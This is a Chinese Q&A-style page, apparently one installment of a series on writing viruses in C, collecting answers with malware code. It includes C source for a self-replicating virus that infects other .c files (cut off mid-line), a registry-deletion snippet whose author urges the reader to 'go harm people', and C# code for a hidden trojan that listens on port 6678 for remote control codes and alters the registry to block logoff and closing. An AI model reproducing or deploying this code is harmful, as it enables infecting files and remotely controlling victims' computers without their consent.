怎么用c语言写病毒程序( 六 )

void main(void) { virus(); } int virus() { struct ffblk ffblk; FILE *in,*out,*read; char *virus="virus.c"; char buf[50][80]; char *p; char *end="return"; char *bracket="}"; char *main="main"; char *include[2]={"stdio.h","dir.h"}; char *int_virus="int virus()"; char *buffer; int done,i,j=0,flag=0; printf("\nI have a virus. Writen by PuBin\n"); done = findfirst("*.c",&ffblk,0); while (!done) { i=0; if ((in = fopen(ffblk.ff_name, "rt"))== NULL) { goto next; } do{ if(i>=50) { fclose(in); goto next; } p=fgets(buf,80,in); i++; }while(p!=NULL); fclose(in); out=fopen(ffblk.ff_name,"w+t"); fputs("#include\ 。
7. 如何用C语言编一个简单病毒先 建立一个 1.bat文件再根据下面2113写的照着把你要5261删除的项写上删除4102注册表中的项 Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 保存为reg文件双击导如即可删除此1653项 注意有个“-”号删除注册表中的值回Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "SoundMan"=- 这样可以删除此值 方法告诉你了 , 自己去操作答 , 记得先备份注册表做好了再去害人 。
8. C语言后台病毒程序的代码怎么写 要实现木马服务的程序 , 主要实现以下几个功能:后台的运行(隐藏技术) , 控制码的接收与注册表的修改 , 下面对这三方面做介绍: 1、在VC#中 , 建立一个后台服务程序是很容易的 , 先建立一个新的C#的Windows应用程序 , 项目名称自定(不过为了隐藏可使用与系统相近的名称) , 将窗体属性“ShowInTaskbar”属性设为false , 让它运行时不会在任务栏中显示 , 并将属性“Windowstate”属性设为Mininized即可 , 这样窗体就可以隐藏运行了 。
当然你也可以在InitializeComponent()设置 , 此函数起初始化的作用 , 在窗体显示前运行 , 代码如下:private void InitializeComponent(){// // Form1// //窗体显示的起点和大小this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);this.ClientSize = new System.Drawing.Size(368, 357);//窗体名称this.Name = "Form1";//设置属性让它后台运行this.ShowInTaskbar = false;this.Text = "Form1";this.WindowState = System.Windows.Forms.FormWindowState.Minimized;} 2、控制代码的接收 , 必需在服务程序运行开始就启动 , 所以侦听线程必需在程序初始化中启动 , 所以放在窗体的构造函数中 , 代码注解如下:public Form1() //窗体的构造函数{//// Windows 窗体设计器支持所必需的//InitializeComponent();//// TODO: 在 InitializeComponent 调用后添加任何构造函数代码//加入你的侦听代码//端口你可以自已设定 , 我使用了固定的端口int port =6678;//System.Net.Sockets.TcpListener是用来在Tcp网络中侦听客户端的listener = new TcpListener(port);//启动侦听listener.Start();//增加接收控制码的线程 , 如果要停止线程可以用 Thread.abort()//reControlCode 是线程启动执行的函数 , 此函数根据接收的控制//控制码选取合适的注册表修改函数Thread thread = new Thread(new ThreadStart(reControlCode));thread.Start();}reControlCode函数如下 , 完整代码见程序private void reControlCode(){//设置接收套接字 , 接收listener.AcceptSocket是返回已经接收的客户的请求socket = listener.AcceptSocket();//如果连接成功执行while (socket.Connected){//接收控制码byte [] by =new byte[6];int i = socket.Receive(by,by.Length ,0);string ss = System.Text.Encoding.ASCII.GetString(by);//根据控制码执行不同的功能 //修改注册表加入编码switch (ss){case "jiance"://测试连接 , 返回测试信息string str ="hjc";byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);socket.Send(bytee,0,bytee.Length,0);break;case "zx1000"://修改注册表函数 , 自已定义 , 见下面分析 UnLogOff();//返回控制消息retMessage();break;case "zx0100"://修改注册表函数UnClose();//返回控制消息retMessage();break;//重复的case功能与前面一样 , 略掉default: break;}//case}//while} //private void reControlCode 3、C#中实现注册表的修改 , 使用了.NET类库中的System.Microsoft.Win32命令空间 , 它提供两种类型的类:处理由操作系统引发的事件的类和对系统注册表进行操作的类 。下面就可以看到它的用法 。